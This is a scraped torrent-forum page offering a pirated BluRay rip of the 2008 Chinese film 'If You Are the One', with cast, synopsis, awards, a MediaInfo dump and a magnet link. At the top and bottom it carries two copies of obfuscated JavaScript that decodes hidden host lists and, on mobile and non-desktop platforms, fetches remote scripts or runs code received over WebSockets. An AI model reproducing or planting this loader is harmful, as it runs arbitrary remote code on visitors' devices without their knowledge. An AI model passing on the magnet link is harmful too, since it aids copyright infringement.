非诚勿扰[国语配音/中文字幕].If.You.Are.The.One.2008.1080p.BluRay.x265.10bit.DTS 6.01GB

版主小s 1月前 202

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

、◎译 名 非诚勿扰 / If You Are the One

◎年 代 2008

◎产 地 中国大陆

◎类 别 喜剧 / 爱情

◎语 言 汉语普通话 / 日语

◎上映日期 2008-12-18(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt1330607/

◎豆瓣评分 7.2/10 (387184人评价)

◎豆瓣链接 https://movie.douban.com/subject/3313801/

◎片 长 130分钟

◎导 演 冯小刚 Xiaogang Feng (id:1274255)

◎编 剧 冯小刚 Xiaogang Feng (id:1274255)

陈国富 Kuo-fu Chen (id:1075862)

◎演 员 葛优 You Ge (id:1000905)

舒淇 Qi Shu (id:1138320)

范伟 Wei Fan (id:1051526)

方中信 Alex Fong (id:1033102)

胡可 Ke Hu (id:1274939)

巩新亮 Xinliang Gong (id:1001890)

车晓 Xiao Che (id:1276038)

冯远征 Yuanzheng Feng (id:1043136)

罗海琼 Haiqiong Luo (id:1274417)

邬逸聪 Yicong Wu (id:1276031)

何佳怡 Jiayi He (id:1318149)

李琳 Lin Li (id:1320411)

胡晓峰 Xiaofeng Hu (id:1385113)

何丽嫦 Lorraine Ho (id:1418364)

庄澄 John Chong (id:1280710)

陈国富 Kuo-fu Chen (id:1075862)

杨庭恺 Bernard Yang (id:1443208)

白小妍 Xiaoyan Bai (id:1406328)

亢晓天 (id:1456696)

吕乐 Yue Lu (id:1274303)

石海鹰 Haiying Shi (id:1335014)

文念中 Lim Chung Man (id:1275158)

韩军生 Junsheng Han (id:1433302)

赵楠 Nan Zhao (id:1325307)

费尔·琼斯 Phil Jones (id:1304989)

彭浩翔 Ho-Cheung Pang (id:1000148)

◎标 签 冯小刚 / 葛优 / 喜剧 / 舒淇 / 爱情 / 非诚勿扰 / 中国电影 / 中国

◎简 介

海归秦奋(葛优 饰)的天才发明“分歧终端机”因能公平和平地解决人类分歧,被风投者以200万英镑高价买走。秦奋也开始踏上网上征婚的路途,一路笑话不断,不是重遇Gay友,就是遇到推销客,秦奋颇有点心灰意冷,以致遇到清冷女子梁笑笑(舒淇 饰)时便开门见山请求对方说明来意。这次更为棘手,笑笑爱上有妇之夫,陷于苦恋中不停挣扎,这次纯属听从家里人安排才出来与秦奋见上一面。不再打算再见的二人尽情地分享了生命中最隐秘的秘密。

然而不久,打算和旧爱分手的笑笑找到秦奋,说要嫁给他,但想与他先去北海道一趟。因她与旧爱的爱情是在那里开始的,如今想在那里结束。秦奋答应了。二人踏上北海道之旅,秦奋在北海道的老友对他们盛情招待,三人游遍北海道各处,秦奋知道自己得不到笑笑的心,却不知道笑笑心中抑郁难解的结正冲向海底的漩涡……

◎获奖情况 (共13项)

第28届香港电影金像奖 (2009)

最佳亚洲电影(提名)

第30届大众电影百花奖 (2010)

最佳导演

└──冯小刚 (id:1274255)

最佳女主角(提名)

└──舒淇 (id:1138320)

最佳男配角(提名)

└──冯远征 (id:1043136)

最佳女配角(提名)

└──车晓 (id:1276038)

最佳新人(提名)

└──巩新亮 (id:1001890)

第13届中国电影华表奖 (2009)

优秀境外华裔女演员奖

└──舒淇 (id:1138320)

优秀合拍片奖

第3届亚洲电影大奖 (2009)

最佳导演(提名)

└──冯小刚 (id:1274255)

最佳男主角(提名)

└──葛优 (id:1000905)

第16届北京大学生电影节 (2009)

最佳影片奖(提名)

最佳男演员奖(提名)

└──葛优 (id:1000905)

评委会大奖

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 57075554365523208903316261221326631024 (0x2AF05A17B9751EEA5D2FAE1B4023B070)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.00 GiB

  8. Duration : 2 h 7 min

  9. Overall bit rate : 6 749 kb/s

  10. Encoded date : UTC 2021-10-23 16:00:05

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 7 min

  20. Bit rate : 5 200 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.138

  30. Stream size : 4.63 GiB (77%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4353 (0x1101)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 2 h 7 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 16 bits

  49. Compression mode : Lossy

  50. Stream size : 1.34 GiB (22%)

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No

  54. Original source medium : Blu-ray


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4608 (0x1200)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 2 h 1 min

  63. Bit rate : 27.7 kb/s

  64. Count of elements : 3802

  65. Stream size : 24.2 MiB (0%)

  66. Title : chs

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4609 (0x1201)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 2 h 1 min

  79. Bit rate : 28.5 kb/s

  80. Count of elements : 3802

  81. Stream size : 24.8 MiB (0%)

  82. Title : cht

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Text #3

  88. ID : 5

  89. ID in the original source medium : 4610 (0x1202)

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 2 h 1 min

  95. Bit rate : 34.9 kb/s

  96. Count of elements : 3802

  97. Stream size : 30.5 MiB (0%)

  98. Title : eng

  99. Language : English

  100. Default : No

  101. Forced : No

  102. Original source medium : Blu-ray


  103. Menu

  104. 00:00:00.000 : en:Chapter 01

  105. 00:03:13.818 : en:Chapter 02

  106. 00:07:56.726 : en:Chapter 03

  107. 00:11:50.835 : en:Chapter 04

  108. 00:18:24.978 : en:Chapter 05

  109. 00:23:36.540 : en:Chapter 06

  110. 00:28:39.259 : en:Chapter 07

  111. 00:35:35.591 : en:Chapter 08

  112. 00:41:45.586 : en:Chapter 09

  113. 00:46:55.687 : en:Chapter 10

  114. 00:51:08.106 : en:Chapter 11

  115. 00:58:19.912 : en:Chapter 12

  116. 01:04:26.654 : en:Chapter 13

  117. 01:08:45.371 : en:Chapter 14

  118. 01:11:42.673 : en:Chapter 15

  119. 01:16:55.944 : en:Chapter 16

  120. 01:24:18.511 : en:Chapter 17

  121. 01:29:12.138 : en:Chapter 18

  122. 01:33:02.034 : en:Chapter 19

  123. 01:39:45.604 : en:Chapter 20

  124. 01:44:32.933 : en:Chapter 21

  125. 01:48:35.675 : en:Chapter 22

  126. 01:51:56.584 : en:Chapter 23

  127. 01:58:04.744 : en:Chapter 24

  128. 02:02:34.930 : en:Chapter 25




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:5594DE81605A700252D730564265674EF589F42D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};